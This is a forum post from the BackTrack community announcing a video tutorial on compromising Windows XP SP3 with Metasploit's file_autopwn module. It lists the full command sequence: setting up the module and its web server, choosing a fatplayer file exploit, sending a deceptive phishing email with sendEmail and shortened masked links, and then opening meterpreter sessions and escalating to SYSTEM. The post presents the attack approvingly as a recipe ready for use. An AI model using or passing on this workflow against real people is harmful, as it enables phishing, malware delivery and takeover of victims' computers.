Results 1 to 3 of 3

Thread: [Video] Owning Windows (XP SP3 Vs. Metasploit's file_autopwn)

Threaded View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Owning Windows (XP SP3 Vs. Metasploit's file_autopwn)

    Links
    Watch video on-line: http://blip.tv/file/4924033
    Download video:
    http://www.mediafire.com/?c97d39n4df5bqda


    Brief Overview
    This screencast demonstrates metasploits ability to automatically generate vulnerable files which are read by a certain application to create an exploit.

    After choosing a file to use, the attacker sends a email to the target with a masked URL to the vulnerable file and a link to the application, which is the "correct" version of it too!

    Other examples of metasploits "autopwn" features: db_autopwn and browser_pwn



    What do I need?
    * Metasploit – (Can be found on BackTrack 4-R2). Download here
    * SendEmail + SMTP details – (SendEmail can be found on BackTrack 4-R2). Download sendemail here
    * URL shorter service – (Can be found by using a internet search engine).


    Method
    * Start network services and obtain an IP address
    * Start metasploit and configure file_autopwn
    * Wait for web server to be active
    * Browser available files and view information of that particular one.
    * Discover homepage and download information
    * Create masked URLs
    * Socially engineer an email to the target with all the information
    * Wait for target to download the file and load it in the program
    * Game Over


    Commands: *Due to the forums security, I'm unable to post the complete command list.*
    Code:
    start-network
    dhclient eth0
    clear
    
    msfconsole
    search autopwn
    use server/file_autopwn
    show options
    set LHOST 192.168.0.33
    set SRVPORT 80
    set URIPATH /
    #set SSL true
    #set ExitOnSession false
    show options
    #show advanced
    #set CREATEFILES false
    run
    
    Firefox -> 192.168.0.33 -> Ctrl + F -> fatplayer
    
    search fatplayer
    info windows/fileformat/fatplayer_wav
    
    sendEmail -f "*************************************" -t ***************************** -u "You've gonna listen to this" -m "O.M.G.
    CHECK THIS OUT. You HAVE to listen to this as soon as you can [URL]
    
    You'll need to grab this ([URL]) to listen to this." -s [smtp host] -xu [smtp user] -xp [smtp pass] 
    
    #IE -> [target's online email] -> Login -> Download FatPlayer -> Install/Extract -> Click exploit link
    
    sessions -l -v
    sessions -i 1
    sysinfo
    getuid
    getsystem
    getuid
    Walk-through
    The attacker approaches this attack differently by attacking desktop application installed on the operating system (OS) by using a collection of “file exploits”.

    To start things, the attacker starts metasploit and locates the file_autopwn module. After examining the required information, the attacker proceeds by entering all the details which are needed. Once this has been done, the attacker sets metasploit to work by creating a mass of vulnerable files after which have been created metasploit set ups a web server which is the going to be used for the delivery method.

    The attacker visits the web server themselves to see what is available. After choosing the program "fatplayer", they decide to increase their chance of success by finding the program's homepage so they can pass this information on to the target, which makes it "nice and easy" for the target to download and run.
    The attacker needs to make sure that they send a vulnerable version of the program to the target however, so they check to see what information is given about the file exploit.

    The attacker chooses to socially engineer the target by sending them a email with a link to the file setup and a brief description. To help increase success, the attacker masks the URL of both files by using URL shortening services. Once the target clicks on the shortened link, they are automatically redirected to the "longer URL".

    The attacker just has to simply wait to see if the target "falls for it" and runs the exploit file.... which the target does. =)



    Notes:
    * You will need to find/use your own SMTP details.
    * You can use any number of URL shortening services.
    * You could of used any files generated by metasploit.
    * You could of attach the file instead of linking in the email (See here for a example), however alot of email services now have anti-virus checking built in...

    Song: Sidney Samson (featuring Wizard Sleeve) - Riverside (Lets Go!) (Warren Clarke Remix)
    Video length: 6:00
    Capture length: 18:11
    Blog Post: http://g0tmi1k.blogspot.com/2011/03/video-owning-windows-xp-sp3-vs.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/38998-%5Bvideo%5D-owning-windows-xp-sp3-vs-metasploits-file_autopwn.html#post192417

    Last edited by g0tmi1k; 03-27-2011 at 07:48 PM.
    Have you...g0tmi1k?

Similar Threads

  1. [Video] Owning Windows (XP SP3 vs. Squid)
    By g0tmi1k in forum BackTrack Videos
    Replies: 4
    Last Post: 03-24-2011, 03:08 PM
  2. [Video] Owning Sever through Local File Include
    By spawn in forum BackTrack Videos
    Replies: 1
    Last Post: 03-08-2011, 06:13 PM
  3. Replies: 5
    Last Post: 03-07-2011, 12:18 AM
  4. Replies: 1
    Last Post: 03-04-2011, 04:34 PM
  5. Metasploit auxilary file_autopwn module - Video Tutorial
    By brtw2003 in forum BackTrack Videos
    Replies: 5
    Last Post: 03-13-2010, 11:20 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •